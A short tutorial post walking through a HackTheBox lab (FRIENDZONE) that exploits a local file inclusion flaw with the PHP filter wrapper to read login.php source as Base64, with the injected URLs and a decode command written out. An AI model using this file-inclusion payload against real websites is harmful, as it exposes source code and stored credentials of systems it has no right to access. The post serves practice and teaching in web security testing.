Tips & Tricks, WebApp 101

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source-code of the page.

In this example, we’ll be using FRIENDZONE on HackTheBox.


Confirming LFI on our example

At the following URL, we found that we have LFI capabilities on the ?pagename parameter. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

If we adjust ?pagename to the name of a php page that exists on the box, it will display that page beneath the “Something wen worng” text. For example, let’s view the contents of a php page named timestamp.php.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp


Using Base64 Encoding to View Source Code

We can specify the following PHP Wrapper to encode a file in Base64.

php://filter/convert.base64-encode/resource=<filename>

Let’s inject that into our LFI, and specify the file we want to view the contents of (login.php)
https://administrator1.friendzone.red/dashboard.php?image_id=z.gif&pagename=php://filter/convert.base64-encode/resource=login

Now, let’s copy that returned Base64 and run the following command within Kali.

echo -n <Base64> | base64 -d

The results show us the source code of login.php! We could also rerun the above command with > login.php appended to save our own file.


That’s it! Super simple.